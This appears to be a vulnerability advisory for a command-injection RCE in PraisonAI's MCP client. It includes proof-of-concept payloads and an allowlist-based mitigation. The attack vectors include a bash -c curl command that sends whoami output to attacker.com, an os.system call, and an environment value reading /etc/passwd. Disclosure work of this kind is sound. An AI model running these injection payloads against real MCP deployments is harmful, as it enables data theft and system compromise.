A critical Remote Code Execution (RCE) vulnerability exists in PraisonAI's MCP (Model Context Protocol) integration through the `StdioServerParameters.command` and `args` fields. Insufficient input validation when creating MCP client connections allows arbitrary command execution: user-controlled input is passed directly to subprocess execution without sanitization or validation, enabling attackers to run arbitrary system commands with the privileges of the PraisonAI process.
The vulnerability stems from the direct use of user-provided input in the MCP class constructor and related MCP client implementations. When users specify MCP server commands through various interfaces (Agent tools, direct MCP instantiation, or configuration), the input is processed through shlex.split() for parsing but then directly passed to StdioServerParameters without validation. This creates multiple attack vectors where malicious commands can be injected and executed.
The core vulnerability exists in the following flow:
- User input is accepted through MCP class instantiation or Agent tool configuration
- Input is parsed using `shlex.split()` to separate command and arguments
- Parsed components are directly passed to `StdioServerParameters(command=cmd, args=arguments)`
- The MCP client uses these parameters to spawn processes via `anyio.open_process()` or similar mechanisms
- Arbitrary commands execute with the application's privileges
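As an illustration of the parsing step (a standalone sketch, not PraisonAI code; the command string is a hypothetical attacker payload), `shlex.split()` tokenizes the input but performs no validation, so attacker-supplied commands and arguments pass through intact:

```python
import shlex

# Hypothetical attacker-supplied command string (illustrative only)
command_or_string = "bash -c 'curl http://attacker.example/steal'"

# This mirrors the parsing step described above: the string is split
# into a command and argument list, with quoting preserved verbatim
parts = shlex.split(command_or_string)
cmd, arguments = parts[0], parts[1:]

print(cmd)        # → bash
print(arguments)  # → ['-c', 'curl http://attacker.example/steal']
```

Nothing in this step distinguishes a legitimate MCP server launch from a malicious one; whatever survives tokenization becomes the spawned process.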
File: src/praisonai-agents/praisonaiagents/mcp/mcp.py
Lines: 270-315
The vulnerable code pattern:
```python
# Handle the single string format for stdio client
if isinstance(command_or_string, str) and args is None:
    # Split the string into command and args using shell-like parsing
    if platform.system() == 'Windows':
        parts = shlex.split(command_or_string, posix=False)
        parts = [part.strip('"') for part in parts]
    else:
        parts = shlex.split(command_or_string)
    if not parts:
        raise ValueError("Empty command string")
    cmd = parts[0]  # ← User-controlled command
    arguments = parts[1:] if len(parts) > 1 else []  # ← User-controlled args
else:
    cmd = command_or_string  # ← Direct user input
    arguments = args or []  # ← Direct user input

# Vulnerable sink point - direct use without validation
self.server_params = StdioServerParameters(
    command=cmd,  # ← Arbitrary command execution
    args=arguments,  # ← Arbitrary arguments
    **kwargs
)
```

File: src/praisonai-agents/tests/npx_mcp_wrapper_main.py
Lines: 77-82, 177-182
Multiple instances where user input flows directly to StdioServerParameters:
```python
# Extract tools function
server_params = StdioServerParameters(
    command=command,  # ← User-controlled
    args=args  # ← User-controlled
)

# Call tool function
server_params = StdioServerParameters(
    command=command,  # ← User-controlled
    args=args  # ← User-controlled
)
```

The vulnerability can be exploited through multiple vectors in PraisonAI. The most direct approach is through MCP class instantiation, where users can specify arbitrary commands.
Attack Vector 1: Direct MCP instantiation
```python
from praisonaiagents import Agent, MCP

# Malicious command injection via MCP constructor
malicious_agent = Agent(
    instructions="You are a helpful assistant",
    llm="gpt-4o-mini",
    tools=MCP("touch /tmp/pwned.txt && echo 'Command injection successful'")
)
```

Attack Vector 2: Through Agent tool configuration
```python
from praisonaiagents import Agent, MCP

# Command injection through args parameter
agent = Agent(
    instructions="Assistant with tools",
    llm="gpt-4o-mini",
    tools=MCP(
        command="bash",
        args=["-c", "curl http://attacker.com/steal?data=$(whoami)"]
    )
)
```

Attack Vector 3: Environment variable injection
```python
from praisonaiagents import Agent, MCP

# Injection through environment variables
agent = Agent(
    instructions="Assistant",
    llm="gpt-4o-mini",
    tools=MCP(
        "python",
        args=["-c", "import os; os.system('malicious_command')"],
        env={"MALICIOUS_VAR": "$(cat /etc/passwd)"}
    )
)
```

This vulnerability enables complete system compromise through:
- Arbitrary Command Execution: Attackers can execute any system command with application privileges
- Data Exfiltration: Sensitive files and environment variables can be accessed and transmitted
- Privilege Escalation: If PraisonAI runs with elevated privileges, attackers inherit those privileges
- Persistence: Attackers can install backdoors, modify system configurations, or establish reverse shells
- Lateral Movement: In containerized or networked environments, attackers can pivot to other systems
The vulnerability is particularly dangerous because:
- It can be triggered through seemingly legitimate AI assistant interactions
- No direct code access is required - only the ability to configure MCP tools
- The attack surface includes multiple entry points across the codebase
- Exploitation can be disguised as normal AI tool usage
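One defense is to validate the parsed command against an allowlist and inspect arguments before constructing `StdioServerParameters`. The following is a minimal standalone sketch, not PraisonAI code; the `ALLOWED_COMMANDS` set and `validate_mcp_command` helper are hypothetical names chosen for illustration:

```python
import shlex

# Hypothetical allowlist of interpreters a deployment actually needs
ALLOWED_COMMANDS = {"npx", "uvx", "node", "python"}

def validate_mcp_command(command_string: str) -> tuple[str, list[str]]:
    """Parse a command string and reject anything outside the allowlist."""
    parts = shlex.split(command_string)
    if not parts:
        raise ValueError("Empty command string")
    cmd, args = parts[0], parts[1:]
    if cmd not in ALLOWED_COMMANDS:
        raise ValueError(f"Command not permitted: {cmd!r}")
    # Reject shell metacharacters that survive tokenization into arguments
    for arg in args:
        if any(ch in arg for ch in (";", "|", "&", "$", "`")):
            raise ValueError(f"Suspicious argument: {arg!r}")
    return cmd, args

cmd, args = validate_mcp_command("npx -y some-mcp-server")
print(cmd, args)  # → npx ['-y', 'some-mcp-server']

# A payload like "bash -c 'curl http://attacker.example'" now raises ValueError
```

Allowlisting is only one layer; running MCP servers under a low-privilege user or in a sandbox limits the blast radius if validation is bypassed.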